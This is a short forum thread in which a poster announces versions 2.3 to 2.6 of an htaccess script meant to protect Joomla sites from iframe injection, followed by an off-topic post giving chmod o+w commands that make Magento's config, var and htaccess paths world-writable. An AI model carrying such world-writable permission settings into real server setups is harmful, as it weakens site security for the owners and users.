Blocking out the sites to which the iframe is refering to, doesn't work. You are already hacked by then. You should remove all of your pages of your website and uplaod a fresh copy of Joomla. Then install my script.

[locutus]

Version 2.3 is out!

Check the first post for more information.

[locutus]

Update your htaccess to version 2.4!!!

[locutus]

Version 2.5 is out for Joomla 1.5.x. I recommend all users to upgrade!

[locutus]

Version 2.6 is out for Joomla 1.5.x.

Fixed a small bug for the joomla 1.5.x administration.

[Neeraj123]

hiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii

If you have access to SSH, you can use the following commands to change permissions prior to installing (and after extracting the files)

cd magento
chmod o+w var var/.htaccess app/etc
chmod -R o+w media

• Twitter background contest!
• Hello Community,
  
  The SimpleMachines Te...
• A reminder to update your email and passwords
• Hello community,
  
      The Simple Machin...
• SMF 2.0 Release Candidate 3 is out!
• Hello all,
  
  We are pleased to announce ...